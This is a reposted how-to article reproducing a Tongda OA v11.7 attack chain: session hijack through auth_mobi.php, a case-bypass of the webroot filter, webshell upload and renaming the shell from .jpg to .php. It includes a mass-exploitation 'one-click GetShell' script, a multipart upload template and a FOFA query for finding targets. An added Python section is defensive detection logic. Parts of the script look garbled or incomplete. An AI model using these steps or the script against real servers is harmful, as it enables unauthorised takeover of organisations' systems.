2025-02-23 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)05/31 Report--
This article reproduces the online-user login vulnerability in Tongda OA v11.7 and walks through the analysis of each step in detail, for readers who want a simple and practical way to understand the problem.
Reproducing the online-user login vulnerability in Tongda OA v11.7
This is a vulnerability similar to an authorization bypass, but triggered in an unusual way.
Visit the vulnerable page to obtain a PHPSESSID: http://x.x.x.x/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
The response shows that we have obtained a PHPSESSID, so we can now visit the administrator's backend page. If the page shows RELOGIN, the vulnerability exists but the administrator is not currently logged in, so we have to wait until they are online.
Visit the backend page: http://x.x.x.x/general/
View the local absolute path
Create a new attachment directory
Note: the path to add is the system directory followed by webroot. The string webroot is filtered, but the check is case-sensitive, so it is easily bypassed by writing Webroot instead.
Add an image directory
The only thing to note here is that the system administrator must be added to the publishing scope for this to work. The path is still the webroot path.
Upload the webshell
Then we add a file, which is our webshell.
Note that the webshell must be renamed with a .jpg suffix, otherwise its path cannot be viewed.
View the webshell path
Note the file name at this point. The path is fixed: the webshell sits under file_folder/2013.
Change the webshell suffix
Go back to the upload page from earlier and click Edit.
Hover over the webshell and click Rename.
A new tab opens; we use Firefox to capture the request:
First change the name to anything, click Save, and a POST request will be intercepted.
The request body looks roughly like this:
NEW_FILE_NAME=166&CONTENT_ID=118&FILE_SORT=2&ATTACHMENT_ID=2925%402103_1578257970&ATTACHMENT_NAME_POSTFIX=jpg&ATTACHMENT_NAME=2.jpg&FIRST_ATTACHMENT_NAME=2&FILE_NAME_OLD=2.jpg
Now change the ATTACHMENT_NAME_POSTFIX parameter to php. (Note that there is a dot.)
Then replay the request and you can see that the change succeeded.
Assembling the webshell path
You can see that the change succeeded.
Now take the file name from earlier and replace the original uploaded name (2.jpg) with (166.php), based on the upload path and the new name you gave it; if the path is still file_folder/2013, we can reach our webshell.
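As an added example (not part of the original article), the following Python detection logic walks constructed request records for each stage of the chain described above and shows a case-insensitive version of the webroot directory check; the endpoint paths and sample values are assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample request records (not real logs): (client_ip, method, path+query, body).
# Endpoint paths for the rename and directory forms are placeholders; the body field
# names mirror the packet shown above.
SAMPLE_REQUESTS = [
    ("203.0.113.7", "GET", "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0", ""),
    ("203.0.113.7", "GET", "/general/", ""),
    ("203.0.113.7", "POST", "/general/RENAME_ENDPOINT_PLACEHOLDER.php",
     "NEW_FILE_NAME=166&ATTACHMENT_NAME_POSTFIX=php&ATTACHMENT_NAME=2.jpg&FILE_NAME_OLD=2.jpg"),
    ("198.51.100.9", "POST", "/general/DIR_ENDPOINT_PLACEHOLDER.php",
     "ATTACH_DIR=D%3A%2Foa%2FWebroot%2Fattach"),
    ("198.51.100.9", "GET", "/general/", ""),
]

EXEC_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}


def analyse(requests):
    """Return (ip, rule, detail) alerts for each stage of the chain."""
    alerts, session_grab = [], set()
    for ip, _method, target, body in requests:
        url = urlsplit(target)
        q = {k.lower(): v for k, v in parse_qs(url.query).items()}
        p = {k.lower(): v for k, v in parse_qs(body).items()}
        # Stage 1: auth_mobi.php handing out a session for an arbitrary uid.
        if url.path.endswith("/mobile/auth_mobi.php") and q.get("isavatar") == ["1"] and "uid" in q:
            session_grab.add(ip)
            alerts.append((ip, "session_issue", "uid=" + q["uid"][0]))
        # Stage 2: the same client then reaching the /general/ backend.
        elif url.path.startswith("/general/") and ip in session_grab:
            alerts.append((ip, "hijacked_backend_access", url.path))
        # Stage 3: attachment suffix rewritten to an executable extension.
        for ext in p.get("attachment_name_postfix", []):
            if ext.strip(". ").lower() in EXEC_EXTS:
                alerts.append((ip, "rename_to_executable", ext))
        # Stage 4: any form value steering a directory under webroot (case-insensitive).
        for key, vals in p.items():
            for val in vals:
                if "webroot" in val.lower():
                    alerts.append((ip, "webroot_in_path", key + "=" + val))
    return alerts


def is_safe_attachment_dir(path):
    """Hardened form of the directory filter: case-insensitive match on a normalised
    path, so Webroot/WEBROOT no longer slip past, and no '..' segments allowed."""
    norm = path.replace("\\", "/").lower()
    return "webroot" not in norm and ".." not in norm.split("/")
```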
One-click GetShell script
Script code:
#define payload = /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
#define yinhao = "
#define Rootre = (.*?)
#define contentidre = "TableLine1" index="(.*?)">
#define attachmentidre = ATTACHMENT_ID_OLD" value="(.*?),"
#define shellpathre = alt="(.*?)" Node-image-tips

function GetCookie(url) {
    res = HttpGet(url.payload, "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");
    if (StrFindStr(res[1], "PHPSESSID", 0) == "-1") { return ""; }
    PHPSESSID = GettextMiddle(res[1], "PHPSESSID=", ";");
    return PHPSESSID;
}

function JudgeOK(url, Cookie) {
    res = HttpGet(url."/general/", Cookie);
    if (StrFindStr(res[0], "/static/js/ba/agent.js", 0) == "-1") { return "0"; } else { return "1"; }
}

function GetRoot(content) {
    list = StrRe(content, Rootre);
    num = GetArrayNum(list);
    num = num/2;
    i = 0;
    while (i = 2) { return list[1]; }
    return "";
}

function GetShell(url) {
    PHPSESSID = GetCookie(url);
    if (PHPSESSID == "") { return ""; }
    Cookie = "Cookie: PHPSESSID=".PHPSESSID." ".StrRN()."User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0";
    if (JudgeOK(url, Cookie) == "1") {
        WebRoot = GetWebRoot(url, Cookie);
        AddPath(url, WebRoot, Cookie);
        AddImgPath(url, WebRoot, Cookie);
        ShellPost = ReadFile("script\Integrated vulnerability\OAShell.txt");
        PushImg(url, ShellPost, Cookie);
        path = GetImg(url, WebRoot, Cookie);
        CONTENTID = GetCONTENTID(url, Cookie);
        ATTACHMENTID = GetATTACHMENTID(url, CONTENTID, Cookie);
        ChangeImgName(url, CONTENTID, ATTACHMENTID, Cookie);
        realshellpath = url."/file_folder/2103/".StrReplace(path, "1.jpg", "166.php");
        print("Shell path:", realshellpath, "password: test");
    } else {
        return "";
    }
}

function main(args) {
    print("Please enter the list file to be detected: ");
    list = StrSplit(ReadFile(input()), StrRN());
    i = 0;
    num = GetArrayNum(list);
    while (i < num) {
        url = list[Toint(i)];
        print("connection currently detected: ".url);
        GetShell(url);
        i = i + 1;
    }
    print("detection complete");
}
OAShell.txt:
--33072116513621237124579432636
Content-Disposition: form-data; name="SUBJECT"

166.jpg
--33072116513621237124579432636
Content-Disposition: form-data; name="CONTENT_NO"

--33072116513621237124579432636
Content-Disposition: form-data; name="TD_HTML_EDITOR_CONTENT"

--33072116513621237124579432636
Content-Disposition: form-data; name="KEYWORD"

--33072116513621237124579432636
Content-Disposition: form-data; name="NEW_NAME"

μ
--33072116513621237124579432636
Content-Disposition: form-data; name="NEW_TYPE"

--33072116513621237124579432636
Content-Disposition: form-data; name="ATTACHMENT_1"; filename=""
Content-Type: application/octet-stream

--33072116513621237124579432636
Content-Disposition: form-data; name="ATTACH_NAME"

--33072116513621237124579432636
Content-Disposition: form-data; name="ATTACH_DIR"

--33072116513621237124579432636
Content-Disposition: form-data; name="DISK_ID"

--33072116513621237124579432636
Content-Disposition: form-data; name="ATTACHMENT_1000"; filename=""
Content-Type: application/octet-stream

--33072116513621237124579432636
Content-Disposition: form-data; name="ATTACHMENT_DESC"

--33072116513621237124579432636
Content-Disposition: form-data; name="CONTENT_ID"

--33072116513621237124579432636
Content-Disposition: form-data; name="OP"

--33072116513621237124579432636
Content-Disposition: form-data; name="PD"

1
--33072116513621237124579432636
Content-Disposition: form-data; name="SORT_ID"

0
--33072116513621237124579432636
Content-Disposition: form-data; name="ATTACHMENT_ID_OLD"

--33072116513621237124579432636
Content-Disposition: form-data; name="ATTACHMENT_NAME_OLD"

--33072116513621237124579432636
Content-Disposition: form-data; name="FILE_SORT"

2
--33072116513621237124579432636
Content-Disposition: form-data; name="USE_CAPACITY"

--33072116513621237124579432636
Content-Disposition: form-data; name="USE_CAPACITY_SIZE"

--33072116513621237124579432636
Content-Disposition: form-data; name="SHARE_USER"

--33072116513621237124579432636
Content-Disposition: form-data; name="ATTACHMENT_0"; filename="1.jpg"
Content-Type: image/jpeg

--33072116513621237124579432636--
Attached FOFA search statement:
App="TDXK- access OA"